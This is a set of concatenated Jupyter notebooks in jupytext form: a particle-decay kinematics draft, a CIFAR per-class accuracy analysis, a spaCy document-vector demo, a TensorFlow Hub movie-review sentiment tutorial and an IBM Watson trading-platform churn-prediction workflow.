def get_pt_eta_phi(px, py, pz):
p = np.sqrt(px**2 + py**2 + pz**2)
pt = np.sqrt(px**2 + py**2)
phi = np.arctan2(py, px)
theta = np.arccos(pz/p)
eta = -np.log(np.tan(0.5*theta))
return pt,eta,phi
def view_particle(particles):
pt, eta, phi = get_pt_eta_phi(particles[:, 1], particles[:, 2], particles[:, 3])
fig, axs = plt.subplots(2,2, figsize=(8,8))
axs = axs.flatten()
axs[0].hist(pt)
axs[0].set_xlabel("pT [GeV]")
axs[1].hist(eta)
axs[1].set_xlabel("$\eta$")
axs[2].hist(phi)
axs[2].set_xlabel("$\phi$")
axs[3].hist(particles[:, 0])
axs[3].set_xlabel("E [GeV]")
print("Max pT: {:.2f} GeV".format(np.max(pt)))
print("Max eta: {:.2f}".format(np.max(np.abs(eta))))
print("Max E: {:.2f} GeV".format(np.max(particles[:, 0])))
#mask = (np.abs(input_4vec[:, 0] - 1.0) < 1e-5) & (np.abs(input_4vec[:, 3]) < 1e-5)
mask = ...
help(view_particle_4vec)
view_particle_4vec(input_4vec[mask])
view_particle_4vec(truth_4vec[mask, 1], )
view_particle_4vec(truth_4vec[mask, 2])
plt.subplots(figsize=(6,6))
plt.hist(truth_4vec[mask, 1, 0]/truth_4vec[mask, 0, 0], bins=50)
plt.xlabel("$E_1$/$E$")
plt.show()
# # Another approach
#
# Incoming particle [P, E] decays to two products ($1\to2$ process).
# Product one:
# * $e_1 = E * z$
# * $p_{x}^{1} = px$
truth_4vec[0]
[E, px, py, pz] --> MLP -> [px, py, pz, z]
|
notebooks/Read-Herwig-1GeV.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pathlib
import json
import numpy as np
# load labels of the test set
candidate_file = 'candidate.npz'
test_labels = np.load(candidate_file)['y_test']
# +
# load the indices of the correctly classified test images across different runs
correct_dirs = pathlib.Path.cwd() / 'results' / 'resnet'
cndt_corr_list, cifar_corr_list = list(), list()
for json_file in correct_dirs.glob('*.json'):
with open(json_file) as fn:
json_dict = json.load(fn)
cifar_corr_list.append(json_dict) if 'cifar' in str(json_file) else cndt_corr_list.append(json_dict)
# +
image_per_cls = 200
num_cls = 10
cndt_corr_dict, cifar_corr_dict = dict(), dict()
for i in range(num_cls):
cndt_corr_dict[i] = [len([idx for idx in crlist['correct'] if test_labels[int(idx)] == i])
for crlist in cndt_corr_list]
cifar_corr_dict[i] = [len([idx for idx in crlist['correct'] if test_labels[int(idx)] == i])
for crlist in cifar_corr_list]
# -
cndt_corr_dict
cifar_corr_dict
# +
cifar10_classes = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
str_classes = ''
for lbl in cifar10_classes:
str_classes += lbl + ' '
str_classes = str_classes[:-1]
csv_file = 'cifar_accuracy_per_class.csv'
csv_iter = cifar_corr_dict.values() if csv_file[:5] == 'cifar' else cndt_corr_dict.values()
mean_list = [np.mean(corr) for corr in csv_iter]
# std_list = [np.std(corr, ddof=0) for corr in cifar_corr_dict.values()]
mean_list = [np.mean(np.array(corr)/200) for corr in csv_iter]
std_list = [np.std(np.array(corr)/200, ddof=0) for corr in csv_iter]
np.savetxt(csv_file,
np.column_stack((mean_list, std_list)),
fmt='%.4f',
header='class mean std',
comments='',
# delimiter=',',
newline='\n')
with open(csv_file, 'r') as fn:
csv_lines = fn.readlines()
with open(csv_file, 'w') as fn:
for i, ln in enumerate(csv_lines):
if i == 0:
fn.write(ln)
elif i < 11:
fn.write(cifar10_classes[i-1] + ' ' + ln)
else:
print(ln)
# -
|
error_analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="R7Xgt_KQ51l7"
# ## Document Vectors
# Doc2vec allows us to directly learn the representations for texts of arbitrary lengths (phrases, sentences, paragraphs and documents), by considering the context of words in the text into account.<br><br>
# In this notebook we will create a Document Vector for using averaging via spacy. [spaCy](https://spacy.io/) is a python library for Natural Language Processing (NLP) which has a lot of built-in capabilities and features. spaCy has different types of models. The default model for the English language is '**en_core_web_sm**'.
# +
# To install only the requirements of this notebook, uncomment the lines below and run this cell
# ===========================
# !pip install spacy==2.2.4
# ===========================
# +
# To install the requirements for the entire chapter, uncomment the lines below and run this cell
# ===========================
# try :
# import google.colab
# # !curl https://raw.githubusercontent.com/practical-nlp/practical-nlp/master/Ch3/ch3-requirements.txt | xargs -n 1 -L 1 pip install
# except ModuleNotFoundError :
# # !pip install -r "ch3-requirements.txt"
# ===========================
# -
# downloading en_core_web_sm, assuming spacy is already installed
# !python -m spacy download en_core_web_sm
# + colab={} colab_type="code" id="E7n8Mk0dV8eE"
#Import spacy and load the model
import spacy
nlp = spacy.load("en_core_web_sm") #here nlp object refers to the 'en_core_web_sm' language model instance.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="mzTU0cJlWF8o" outputId="4aeeae5f-c091-478e-f728-ba54003ae8d6"
#Assume each sentence in documents corresponds to a separate document.
documents = ["Dog bites man.", "Man bites dog.", "Dog eats meat.", "Man eats food."]
processed_docs = [doc.lower().replace(".","") for doc in documents]
processed_docs
print("Document After Pre-Processing:",processed_docs)
#Iterate over each document and initiate an nlp instance.
for doc in processed_docs:
doc_nlp = nlp(doc) #creating a spacy "Doc" object which is a container for accessing linguistic annotations.
print("-"*30)
print("Average Vector of '{}'\n".format(doc),doc_nlp.vector)#this gives the average vector of each document
for token in doc_nlp:
print()
print(token.text,token.vector)#this gives the text of each word in the doc and their respective vectors.
|
Ch3/07_DocVectors_using_averaging_Via_spacy.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] colab_type="text" id="Ic4_occAAiAT"
# ##### Copyright 2019 The TensorFlow Authors.
# + cellView="form" colab={} colab_type="code" id="ioaprt5q5US7"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + cellView="form" colab={} colab_type="code" id="yCl0eTNH5RS3"
#@title MIT License
#
# Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# # copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# + [markdown] colab_type="text" id="ItXfxkxvosLH"
# # Text classification with TensorFlow Hub: Movie reviews
# + [markdown] colab_type="text" id="hKY4XMc9o8iB"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/tutorials/keras/text_classification_with_hub"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/keras/text_classification_with_hub.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/keras/text_classification_with_hub.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/keras/text_classification_with_hub.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# </table>
# + [markdown] colab_type="text" id="Eg62Pmz3o83v"
# This notebook classifies movie reviews as *positive* or *negative* using the text of the review. This is an example of *binary*—or two-class—classification, an important and widely applicable kind of machine learning problem.
#
# The tutorial demonstrates the basic application of transfer learning with TensorFlow Hub and Keras.
#
# We'll use the [IMDB dataset](https://www.tensorflow.org/api_docs/python/tf/keras/datasets/imdb) that contains the text of 50,000 movie reviews from the [Internet Movie Database](https://www.imdb.com/). These are split into 25,000 reviews for training and 25,000 reviews for testing. The training and testing sets are *balanced*, meaning they contain an equal number of positive and negative reviews.
#
# This notebook uses [tf.keras](https://www.tensorflow.org/guide/keras), a high-level API to build and train models in TensorFlow, and [TensorFlow Hub](https://www.tensorflow.org/hub), a library and platform for transfer learning. For a more advanced text classification tutorial using `tf.keras`, see the [MLCC Text Classification Guide](https://developers.google.com/machine-learning/guides/text-classification/).
# + colab={} colab_type="code" id="2ew7HTbPpCJH"
import numpy as np
import tensorflow as tf
# !pip install tensorflow-hub
# !pip install tfds-nightly
import tensorflow_hub as hub
import tensorflow_datasets as tfds
print("Version: ", tf.__version__)
print("Eager mode: ", tf.executing_eagerly())
print("Hub version: ", hub.__version__)
print("GPU is", "available" if tf.config.experimental.list_physical_devices("GPU") else "NOT AVAILABLE")
# + [markdown] colab_type="text" id="iAsKG535pHep"
# ## Download the IMDB dataset
#
# The IMDB dataset is available on [imdb reviews](https://www.tensorflow.org/datasets/catalog/imdb_reviews) or on [TensorFlow datasets](https://www.tensorflow.org/datasets). The following code downloads the IMDB dataset to your machine (or the colab runtime):
# + colab={} colab_type="code" id="zXXx5Oc3pOmN"
# Split the training set into 60% and 40%, so we'll end up with 15,000 examples
# for training, 10,000 examples for validation and 25,000 examples for testing.
train_data, validation_data, test_data = tfds.load(
name="imdb_reviews",
split=('train[:60%]', 'train[60%:]', 'test'),
as_supervised=True)
# + [markdown] colab_type="text" id="l50X3GfjpU4r"
# ## Explore the data
#
# Let's take a moment to understand the format of the data. Each example is a sentence representing the movie review and a corresponding label. The sentence is not preprocessed in any way. The label is an integer value of either 0 or 1, where 0 is a negative review, and 1 is a positive review.
#
# Let's print first 10 examples.
# + colab={} colab_type="code" id="QtTS4kpEpjbi"
train_examples_batch, train_labels_batch = next(iter(train_data.batch(10)))
train_examples_batch
# + [markdown] colab_type="text" id="IFtaCHTdc-GY"
# Let's also print the first 10 labels.
# + colab={} colab_type="code" id="tvAjVXOWc6Mj"
train_labels_batch
# + [markdown] colab_type="text" id="LLC02j2g-llC"
# ## Build the model
#
# The neural network is created by stacking layers—this requires three main architectural decisions:
#
# * How to represent the text?
# * How many layers to use in the model?
# * How many *hidden units* to use for each layer?
#
# In this example, the input data consists of sentences. The labels to predict are either 0 or 1.
#
# One way to represent the text is to convert sentences into embeddings vectors. We can use a pre-trained text embedding as the first layer, which will have three advantages:
#
# * we don't have to worry about text preprocessing,
# * we can benefit from transfer learning,
# * the embedding has a fixed size, so it's simpler to process.
#
# For this example we will use a **pre-trained text embedding model** from [TensorFlow Hub](https://www.tensorflow.org/hub) called [google/tf2-preview/gnews-swivel-20dim/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1).
#
# There are three other pre-trained models to test for the sake of this tutorial:
#
# * [google/tf2-preview/gnews-swivel-20dim-with-oov/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim-with-oov/1) - same as [google/tf2-preview/gnews-swivel-20dim/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1), but with 2.5% vocabulary converted to OOV buckets. This can help if vocabulary of the task and vocabulary of the model don't fully overlap.
# * [google/tf2-preview/nnlm-en-dim50/1](https://tfhub.dev/google/tf2-preview/nnlm-en-dim50/1) - A much larger model with ~1M vocabulary size and 50 dimensions.
# * [google/tf2-preview/nnlm-en-dim128/1](https://tfhub.dev/google/tf2-preview/nnlm-en-dim128/1) - Even larger model with ~1M vocabulary size and 128 dimensions.
# + [markdown] colab_type="text" id="In2nDpTLkgKa"
# Let's first create a Keras layer that uses a TensorFlow Hub model to embed the sentences, and try it out on a couple of input examples. Note that no matter the length of the input text, the output shape of the embeddings is: `(num_examples, embedding_dimension)`.
# + colab={} colab_type="code" id="_NUbzVeYkgcO"
embedding = "https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1"
hub_layer = hub.KerasLayer(embedding, input_shape=[],
dtype=tf.string, trainable=True)
hub_layer(train_examples_batch[:3])
# + [markdown] colab_type="text" id="dfSbV6igl1EH"
# Let's now build the full model:
# + colab={} colab_type="code" id="xpKOoWgu-llD"
model = tf.keras.Sequential()
model.add(hub_layer)
model.add(tf.keras.layers.Dense(16, activation='relu'))
model.add(tf.keras.layers.Dense(1))
model.summary()
# + [markdown] colab_type="text" id="6PbKQ6mucuKL"
# The layers are stacked sequentially to build the classifier:
#
# 1. The first layer is a TensorFlow Hub layer. This layer uses a pre-trained Saved Model to map a sentence into its embedding vector. The pre-trained text embedding model that we are using ([google/tf2-preview/gnews-swivel-20dim/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1)) splits the sentence into tokens, embeds each token and then combines the embedding. The resulting dimensions are: `(num_examples, embedding_dimension)`.
# 2. This fixed-length output vector is piped through a fully-connected (`Dense`) layer with 16 hidden units.
# 3. The last layer is densely connected with a single output node.
#
# Let's compile the model.
# + [markdown] colab_type="text" id="L4EqVWg4-llM"
# ### Loss function and optimizer
#
# A model needs a loss function and an optimizer for training. Since this is a binary classification problem and the model outputs logits (a single-unit layer with a linear activation), we'll use the `binary_crossentropy` loss function.
#
# This isn't the only choice for a loss function, you could, for instance, choose `mean_squared_error`. But, generally, `binary_crossentropy` is better for dealing with probabilities—it measures the "distance" between probability distributions, or in our case, between the ground-truth distribution and the predictions.
#
# Later, when we are exploring regression problems (say, to predict the price of a house), we will see how to use another loss function called mean squared error.
#
# Now, configure the model to use an optimizer and a loss function:
# + colab={} colab_type="code" id="Mr0GP-cQ-llN"
model.compile(optimizer='adam',
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=['accuracy'])
# + [markdown] colab_type="text" id="35jv_fzP-llU"
# ## Train the model
#
# Train the model for 20 epochs in mini-batches of 512 samples. This is 20 iterations over all samples in the `x_train` and `y_train` tensors. While training, monitor the model's loss and accuracy on the 10,000 samples from the validation set:
# + colab={} colab_type="code" id="tXSGrjWZ-llW"
history = model.fit(train_data.shuffle(10000).batch(512),
epochs=20,
validation_data=validation_data.batch(512),
verbose=1)
# + [markdown] colab_type="text" id="9EEGuDVuzb5r"
# ## Evaluate the model
#
# And let's see how the model performs. Two values will be returned. Loss (a number which represents our error, lower values are better), and accuracy.
# + colab={} colab_type="code" id="zOMKywn4zReN"
results = model.evaluate(test_data.batch(512), verbose=2)
for name, value in zip(model.metrics_names, results):
print("%s: %.3f" % (name, value))
# + [markdown] colab_type="text" id="z1iEXVTR0Z2t"
# This fairly naive approach achieves an accuracy of about 87%. With more advanced approaches, the model should get closer to 95%.
# + [markdown] colab_type="text" id="5KggXVeL-llZ"
# ## Further reading
#
# For a more general way to work with string inputs and for a more detailed analysis of the progress of accuracy and loss during training, take a look [here](https://www.tensorflow.org/tutorials/keras/basic_text_classification).
|
site/en/tutorials/keras/text_classification_with_hub.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python3
# ---
# # Trading Platform Customer Attrition Risk Prediction using sklearn
#
# There are many users of online trading platforms and these companies would like to run analytics on and predict churn based on user activity on the platform. Since competition is rife, keeping customers happy so they do not move their investments elsewhere is key to maintaining profitability.
#
# In this notebook, we will leverage Watson Studio Local (that is a service on IBM Cloud Pak for Data) to do the following:
#
# 1. Ingest merged customer demographics and trading activity data
# 2. Visualize merged dataset and get better understanding of data to build hypotheses for prediction
# 3. Leverage sklearn library to build classification model that predicts whether customer has propensity to churn
# 4. Expose the classification model as RESTful API endpoint for the end-to-end customer churn risk prediction and risk remediation application
#
# <img src="https://github.com/burtvialpando/CloudPakWorkshop/blob/master/CPD/images/NotebookImage.png?raw=true" width="800" height="500" align="middle"/>
#
#
# <a id="top"></a>
# ## Table of Contents
#
# 1. [Load libraries](#load_libraries)
# 2. [Load and visualize merged customer demographics and trading activity data](#load_data)
# 3. [Prepare data for building classification model](#prepare_data)
# 4. [Train classification model and test model performance](#build_model)
# 5. [Save model to ML repository and expose it as REST API endpoint](#save_model)
# 6. [Summary](#summary)
# ### Quick set of instructions to work through the notebook
#
# If you are new to Notebooks, here's a quick overview of how to work in this environment.
#
# 1. The notebook has 2 types of cells - markdown (text) such as this and code such as the one below.
# 2. Each cell with code can be executed independently or together (see options under the Cell menu). When working in this notebook, we will be running one cell at a time because we need to make code changes to some of the cells.
# 3. To run the cell, position cursor in the code cell and click the Run (arrow) icon. The cell is running when you see the * next to it. Some cells have printable output.
# 4. Work through this notebook by reading the instructions and executing code cell by cell. Some cells will require modifications before you run them.
# <a id="load_libraries"></a>
# ## 1. Load libraries
# [Top](#top)
#
# Running the following cell will load all libraries needed to load, visualize, prepare the data and build ML models for our use case
#Uncomment and run once to install the package in your runtime environment
# #!pip uninstall -y sklearn-pandas
# !pip install --no-cache-dir sklearn-pandas==1.7.0
# If the following cell doesn't work, please un-comment out the next line and do upgrade the patplotlib package. When the upgrade is done, restart the kernal and start from the beginning again.
# !pip install --user --upgrade matplotlib
import brunel
import pandas as pd
import numpy as np
import sklearn.pipeline
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler, LabelEncoder, StandardScaler, LabelBinarizer, OneHotEncoder
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import f1_score, accuracy_score, roc_curve, roc_auc_score
from sklearn_pandas import DataFrameMapper
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import make_scorer
import json
import matplotlib.pyplot as plt
# %matplotlib inline
# +
#Changed sk-learn version to be compatible with WML client4 on CPD v3.0.1
# #!pip uninstall -y scikit-learn
# #!pip install --no-cache-dir scikit-learn==0.22
# -
# # <a id="load_data"></a>
# ## 2. Load data example
# [Top](#top)
#
# Data can be easily loaded within ICPD using point-and-click functionality. The following image illustrates how to load a merged dataset assuming it is called "customer_demochurn_activity_analyze.csv". The file can be located by its name and inserted into the notebook as a **pandas** dataframe as shown below:
#
# <img src="https://github.com/burtvialpando/CloudPakWorkshop/blob/master/CPD/images/InsertPandasDataFrame.png?raw=true" width="300" height="300" align="middle"/>
#
# The interface comes up with a generic name, so it is good practice to rename the dataframe to match context of the use case. In this case, we will use df_churn.
# +
# Use the `Find and add data` menu item in the top right corner to insert code for a pandas Dataframe
# <INSERT CODE HERE>
# comment out or rename the default df_data_1 dataframe name with the df_churn_pd name used in this notebook
df_churn_pd = pd.read_csv(body)
df_churn_pd.head()
# -
# Data Visualization is key step in data mining process that helps better understand data before it can be prepared for building ML models
#
# We use Brunel library that comes preloaded within Watson Studio local environment to visualize the merged customer data.
#
# The Brunel Visualization Language is a highly succinct and novel language that defines interactive data visualizations based on tabular data. The language is well suited for both data scientists and business users. More information about Brunel Visualization: https://github.com/Brunel-Visualization/Brunel/wiki
#
# Try Brunel visualization here: http://brunel.mybluemix.net/gallery_app/renderer
df_churn_pd.dtypes
df_churn_pd.describe()
# %brunel data('df_churn_pd') stack polar bar x(CHURNRISK) y(#count) color(CHURNRISK) bar tooltip(#all)
# %brunel data('df_churn_pd') bar x(STATUS) y(#count) color(STATUS) tooltip(#all) | stack bar x(STATUS) y(#count) color(CHURNRISK: pink-orange-yellow) bin(STATUS) sort(STATUS) percent(#count) label(#count) tooltip(#all) :: width=1200, height=350
# %brunel data('df_churn_pd') bar x(TOTALUNITSTRADED) y(#count) color(CHURNRISK: pink-gray-orange) sort(STATUS) percent(#count) label(#count) tooltip(#all) :: width=1200, height=350
# %brunel data('df_churn_pd') bar x(DAYSSINCELASTTRADE) y(#count) color(CHURNRISK: pink-gray-orange) sort(STATUS) percent(#count) label(#count) tooltip(#all) :: width=1200, height=350
# <a id="prepare_data"></a>
# ## 3. Data preparation
# [Top](#top)
#
# Data preparation is a very important step in machine learning model building. This is because the model can perform well only when the data it is trained on is good and well prepared. Hence, this step consumes bulk of data scientist's time spent building models.
#
# During this process, we identify categorical columns in the dataset. Categories needed to be indexed, which means the string labels are converted to label indices. These label indices and encoded using One-hot encoding to a binary vector with at most a single one-value indicating the presence of a specific feature value from among the set of all feature values. This encoding allows algorithms which expect continuous features to use categorical features.
#
# Final step in the data preparation process is to assemble all the categorical and non-categorical columns into a feature vector. We use VectorAssembler for this. VectorAssembler is a transformer that combines a given list of columns into a single vector column. It is useful for combining raw features and features generated by different feature transformers into a single feature vector, in order to train ML models.
# #### Use the DataFrameMapper class to declare transformations and variable imputations.
#
# * LabelBinarizer - Converts a categorical variable into a dummy variable (aka binary variable)
# * StandardScaler - Standardize features by removing the mean and scaling to unit variance, z = (x - u) / s
#
# See docs:
# * https://github.com/scikit-learn-contrib/sklearn-pandas
# * https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.StandardScaler.html#sklearn.preprocessing.StandardScaler
# * https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.LabelBinarizer.html#sklearn.preprocessing.LabelBinarizer
# * https://scikit-learn.org/stable/modules/generated/sklearn.pipeline.Pipeline.html
# Defining the categorical columns
categoricalColumns = ['GENDER', 'STATUS', 'HOMEOWNER', 'AGE_GROUP']
numericColumns = ['CHILDREN', 'ESTINCOME', 'TOTALDOLLARVALUETRADED', 'TOTALUNITSTRADED', 'LARGESTSINGLETRANSACTION', 'SMALLESTSINGLETRANSACTION',
'PERCENTCHANGECALCULATION', 'DAYSSINCELASTLOGIN', 'DAYSSINCELASTTRADE', 'NETREALIZEDGAINS_YTD', 'NETREALIZEDLOSSES_YTD']
mapper = DataFrameMapper([
(['GENDER'], LabelBinarizer()),
(['STATUS'], LabelBinarizer()),
(['HOMEOWNER'], LabelBinarizer()),
(['AGE_GROUP'], LabelBinarizer()),
(['CHILDREN'], StandardScaler()),
(['ESTINCOME'], StandardScaler()),
(['TOTALDOLLARVALUETRADED'], StandardScaler()),
(['TOTALUNITSTRADED'], StandardScaler()),
(['LARGESTSINGLETRANSACTION'], StandardScaler()),
(['SMALLESTSINGLETRANSACTION'], StandardScaler()),
(['PERCENTCHANGECALCULATION'], StandardScaler()),
(['DAYSSINCELASTLOGIN'], StandardScaler()),
(['DAYSSINCELASTTRADE'], StandardScaler()),
(['NETREALIZEDGAINS_YTD'], StandardScaler()),
(['NETREALIZEDLOSSES_YTD'], StandardScaler())], default=False)
df_churn_pd.columns
# Define input data to the model
X = df_churn_pd.drop(['ID','CHURNRISK','AGE','TAXID','CREDITCARD','DOB','ADDRESS_1', 'ADDRESS_2', 'CITY', 'STATE', 'ZIP', 'ZIP4', 'LONGITUDE',
'LATITUDE'], axis=1)
X.shape
# Define the target variable and encode with value between 0 and n_classes-1
le = LabelEncoder()
y = le.fit_transform(df_churn_pd['CHURNRISK'])
# split the data to training and testing set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=5)
# <a id="build_model"></a>
# ## 4. Build Random Forest classification model
# [Top](#top)
# We instantiate a decision-tree based classification algorithm, namely, RandomForestClassifier. Next we define a pipeline to chain together the various transformers and estimaters defined during the data preparation step before. Sklearn standardizes APIs for machine learning algorithms to make it easier to combine multiple algorithms into a single pipeline, or workflow.
#
# We split original dataset into train and test datasets. We fit the pipeline to training data and apply the trained model to transform test data and generate churn risk class prediction
import warnings
warnings.filterwarnings("ignore")
# +
# Instantiate the Classifier
random_forest = RandomForestClassifier(random_state=5)
# Define the steps in the pipeline to sequentially apply a list of transforms and the estimator, i.e. RandomForestClassifier
steps = [('mapper', mapper),('RandonForestClassifier', random_forest)]
pipeline = sklearn.pipeline.Pipeline(steps)
# train the model
model=pipeline.fit( X_train, y_train )
model
# -
### call pipeline.predict() on your X_test data to make a set of test predictions
y_prediction = model.predict( X_test )
# show first 10 rows of predictions
y_prediction[0:10,]
# show first 10 rows of predictions with the corresponding labels
le.inverse_transform(y_prediction)[0:10]
# ### Model results
#
# In a supervised classification problem such as churn risk classification, we have a true output and a model-generated predicted output for each data point. For this reason, the results for each data point can be assigned to one of four categories:
#
# 1. True Positive (TP) - label is positive and prediction is also positive
# 2. True Negative (TN) - label is negative and prediction is also negative
# 3. False Positive (FP) - label is negative but prediction is positive
# 4. False Negative (FN) - label is positive but prediction is negative
#
# These four numbers are the building blocks for most classifier evaluation metrics. A fundamental point when considering classifier evaluation is that pure accuracy (i.e. was the prediction correct or incorrect) is not generally a good metric. The reason for this is because a dataset may be highly unbalanced. For example, if a model is designed to predict fraud from a dataset where 95% of the data points are not fraud and 5% of the data points are fraud, then a naive classifier that predicts not fraud, regardless of input, will be 95% accurate. For this reason, metrics like precision and recall are typically used because they take into account the type of error. In most applications there is some desired balance between precision and recall, which can be captured by combining the two into a single metric, called the F-measure.
# display label mapping to assist with interpretation of the model results
label_mapping=le.inverse_transform([0,1,2])
print('0: ', label_mapping[0])
print('1: ', label_mapping[1])
print('2: ', label_mapping[2])
# +
### test your predictions using sklearn.classification_report()
report = sklearn.metrics.classification_report( y_test, y_prediction )
### and print the report
print(report)
# -
print('Accuracy: ',sklearn.metrics.accuracy_score( y_test, y_prediction ))
# #### Get the column names of the transformed features
m_step=pipeline.named_steps['mapper']
m_step.transformed_names_
features = m_step.transformed_names_
# Get the features importance
importances = pipeline.named_steps['RandonForestClassifier'][1].feature_importances_
indices = np.argsort(importances)
plt.figure(1)
plt.title('Feature Importances')
plt.barh(range(len(indices)), importances[indices], color='b',align='center')
plt.yticks(range(len(indices)), (np.array(features))[indices])
plt.xlabel('Relative Importance')
# <a id="save_model"></a>
# ## 5. Save the model into WML Deployment Space
# [Top](#top)
# Before we save the model we must create a deployment space. Watson Machine Learning provides deployment spaces where the user can save, configure and deploy their models. We can save models, functions and data assets in this space.
#
# The steps involved for saving and deploying the model are as follows:
#
# 1. Lookup the pre-created deployment space.
# 2. Set this deployment space as the default space.
# 3. Store the model pipeline in the deployment space. Enter the name for the model in the cell below.
# 4. Deploy the saved model. Enter the deployment name in the cell below.
# 5. Retrieve the scoring endpoint to score the model with a payload
#
# We use the ibm_watson_machine_learning library to complete these steps.
# +
# #!pip install ibm-watson-machine-learning==1.0.14
# #!pip uninstall -y ibm-watson-machine-learning
# #!pip install --no-cache-dir ibm-watson-machine-learning==1.0.14
# +
# Specify a names for the space being created, the saved model and the model deployment
space_name = 'churnrisk_deployment_space'
model_name = 'churnrisk_model_nb'
deployment_name = 'churnrisk_model_deployment'
# +
from ibm_watson_machine_learning import APIClient
# create the WML credentials with the apikey
wml_credentials = {
"url": "https://us-south.ml.cloud.ibm.com",
"apikey":"INSERT YOUR APIKEY HERE"
}
client = APIClient(wml_credentials)
# -
# ### 5.1 Lookup Deployment Space
for space in client.spaces.get_details()['resources']:
if space_name in space['entity']['name']:
space_id = space['metadata']['id']
print(space_id)
client.set.default_space(space_id)
# ### 5.2 Store the model in the deployment space
# list all supported software specs
client.software_specifications.list()
# run this line if you do not know the version of scikit-learn that was used to build the model
# !pip show scikit-learn
#software_spec_uid = client.software_specifications.get_uid_by_name('scikit-learn_0.22-py3.6')
software_spec_uid = client.software_specifications.get_uid_by_name('scikit-learn_0.20-py3.6')
# +
metadata = {
client.repository.ModelMetaNames.NAME: model_name,
client.repository.ModelMetaNames.SOFTWARE_SPEC_UID: software_spec_uid,
client.repository.ModelMetaNames.TYPE: "scikit-learn_0.20"
}
stored_model_details = client.repository.store_model(pipeline,
meta_props=metadata,
training_data=X_train,
training_target=y_train)
# -
stored_model_details
# ### 5.3 Create a deployment for the stored model
# +
# deploy the model
meta_props = {
client.deployments.ConfigurationMetaNames.NAME: deployment_name,
client.deployments.ConfigurationMetaNames.ONLINE: {}
}
# deploy the model
model_uid = stored_model_details["metadata"]["id"]
deployment_details = client.deployments.create( artifact_uid=model_uid, meta_props=meta_props)
# -
# ### 5.4 Score the model
# +
# retrieve the scoring endpoint
scoring_endpoint = client.deployments.get_scoring_href(deployment_details)
print('Scoring Endpoint: ',scoring_endpoint)
# -
scoring_deployment_id = client.deployments.get_uid(deployment_details)
client.deployments.get_details(scoring_deployment_id)
payload = [{"values": [ ['Young adult','M','S', 2,56000, 'N', 5030, 23, 2257, 125, 3.45, 2, 19, 1200, 251]]}]
payload_metadata = {client.deployments.ScoringMetaNames.INPUT_DATA: payload}
# score
predictions = client.deployments.score(scoring_deployment_id, payload_metadata)
predictions
# display label mapping to assist with interpretation of the model results
label_mapping=le.inverse_transform([0,1,2])
print('0: ', label_mapping[0])
print('1: ', label_mapping[1])
print('2: ', label_mapping[2])
# ### Useful Helper Functions
# #### Create download links for the test data .csv files for batch scoring and model evaluations
# +
# Define functions to download as CSV or Excel
from IPython.display import HTML
import pandas as pd
import base64, io
# Download as CSV: data frame, optional title and filename
